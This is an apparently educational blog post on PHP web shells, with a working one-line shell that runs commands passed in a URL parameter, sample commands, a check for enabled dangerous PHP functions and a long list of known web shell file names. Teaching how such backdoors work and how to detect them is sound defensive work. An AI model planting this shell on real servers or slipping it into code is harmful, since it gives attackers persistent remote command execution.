PHP is the backbone of almost every popular CMS today. And, it is usually the preferred choice for dynamic web applications. However, due to poor coding standards, compromising PHP sites has become relatively easy.
So what is a web shell?
According to Wikipedia, “A web shell is a web security threat, which is a web-based implementation of the shell concept. A web shell is able to be uploaded to a webserver to allow remote access to the webserver, such as the web server’s file system. A web shell is unique in that it enables users to access a web server by way of a web browser that acts like a command-line interface.”
In other words, a web shell is a malicious script used by an attacker with the intent (think of a backdoor) to escalate and maintain persistent access to an already compromised web application that you can use to execute arbitrary shell commands or browse the filesystem on your remote webserver. One thing to keep in mind is a web shell itself cannot attack or exploit a remote vulnerability, so it is commonly used in a post-exploitation engagement.
Web shells can be written in many programming languages such as PHP, ASP. Perl, Ruby, Python, and Unix shell. However, PHP shells are very common.
In this blog, I want to explain to you how web shells work and how you can detect them and protect your assets with some examples.
Note this is only for educational purposes. Please don’t damage any property that doesn’t belong to you. Towards the end of this blog, I have attached a REPL web-server for you to tinker with the examples. So don’t forget to make use of that.
Let’s start with some of the most common functions used to execute shell commands in PHP.
system( )
The system() function executes the given commands and outputs the result.

shell_exec( )
The shell_exec() function executes command via shell and returns the complete output as a string.
Backticks
You may not be aware but backticks (`) work as shell_exec().

So are you ready for your first web-shell based on the above examples I’ve mentioned? Here you go:
<?php echo system($_GET["cmd"]); ?>
In this example, I’ve given ls -la
in the parameter. So it is listing the files and directories where it is executing:
cmd=ls -la

Now I am creating a new directory called hello-dir
with mkdir
command:
cmd=mkdir hello-dir

You can see the hello-dir
directory got made that is shown in the output when I list the output ls -la
again. Please notice see the URL:
cmd=ls -la

To your surprise, I want to inform you that all these functions are enabled by default in a fresh PHP installation. And, the majority of system/web administrator don’t disable them. The below-mentioned command shows whether those functions are enabled:
<?php echo '<pre>'; print_r(preg_grep("/^(system|exec|shell_exec|passthru|proc_open|popen|curl_exec|curl_multi_exec|parse_ini_file|show_source)$/", get_defined_functions(TRUE)["internal"])); echo '</pre>'; ?>
Below is the output of the dangerous functions that are enabled on the server. Make sure to disable them.

Try your code here:
Here are other web-shells that you should NEVER host them on your (or others) server. They are very dangerous,
- Ajax_PHP Command Shell.php
- Ajax_PHP_Command_Shell.php
- Antichat Shell v1.3.php
- Antichat Shell. Modified by Go0o$E.php
- Antichat Shell.php
- Antichat_Shell_v1.3.php
- Ayyildiz Tim -AYT- Shell v 2.1 Biz.php
- C99madShell v. 2.0 madnet edition.php
- CasuS 1.5.php
- CmdAsp.asp.php.txt
- CrystalShell v.1.php
- Cyber Shell (v 1.0).php
- Cyber Shell.php
- DTool Pro.php
- Dive Shell 1.0 – Emperor Hacking Team.php
- Dive_Shell_1.0_Emperor_Hacking_Team.php
- GFS web-shell ver 3.1.7 – PRiV8.php
- GFS_web-shell_ver_3.1.7_-_PRiV8.php
- GRP WebShell 2.0 release build 2018 (C)2006,Great.php
- Gamma Web Shell.php
- JspWebshell 1.2.php
- JspWebshell_1.2.php
- KA_uShell 0.1.6.php
- KAdot Universal Shell v0.1.6.php
- KAdot_Universal_Shell_v0.1.6.php
- Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php
- Loaderz WEB Shell.php
- Macker’s Private PHPShell.php
- Moroccan Spamers Ma-EditioN By GhOsT.php
- Moroccan_Spamers_Ma-EditioN_By_GhOsT.php
- MySQL Web Interface Version 0.8.php
- MySQL_Web_Interface_Version_0.8.php
- MyShell.php
- Mysql interface v1.0.php
- Mysql_interface_v1.0.php
- NCC-Shell.php
- NGH.php
- NTDaddy v1.9.php
- PH Vayv.php
- PHANTASMA.php
- PHP Shell.php
- PHPRemoteView.php
- PHVayv.php
- PH_Vayv.php
- PhpSpy Ver 2006.php
- Predator.php
- RemExp.asp.php.txt
- Rootshell.v.1.0.php
- STNC WebShell v0.8.php
- Safe0ver Shell -Safe Mod Bypass By Evilc0der.php
- Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php
- Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php
- SimAttacker – Vrsion 1.0.0 – priv8 4 My friend.php
- SimShell 1.0 – Simorgh Security MGZ.php
- SimShell_1.0_-_Simorgh_Security_MGZ.php
- Simple_PHP_backdoor_by_DK.php
- Sincap 1.0.php
- Small Web Shell by ZaCo.php
- Uploader.php
- Web-shell (c)ShAnKaR.php
- WinX Shell.php
- Worse Linux Shell.php
- ZyklonShell.php
- aZRaiLPhp v1.0.php
- aZRaiLPhp_v1.0.php
- accept_language.php
- aspydrv.php
- b374k-mini-shell-php.php.php
- b374k.php.php
- backupsql.php
- c0derz shell [csh] v. 0.1.1 release.php
- c99_locus7s.php
- c99_madnet.php
- cgitelnet.php
- cpanel.php
- cw.php
- cybershell.php
- dC3 Security Crew Shell PRiV.php
- dC3_Security_Crew_Shell_PRiV.php
- erne.php
- ex0shell.php
- fatal.php
- findsock.c
- ftpsearch.php
- g00nshell-v1.3.php
- go-shell.php
- h4ntu shell [powered by tsoi].php
- h4ntu_shell_[powered_by_tsoi].php
- hiddens shell v1.php
- indexer.asp.php.txt
- ironshell.php
- klasvayv.asp.php.txt
- kral.php
- lamashell.php
- load_shell.php
- lolipop.php
1 Comment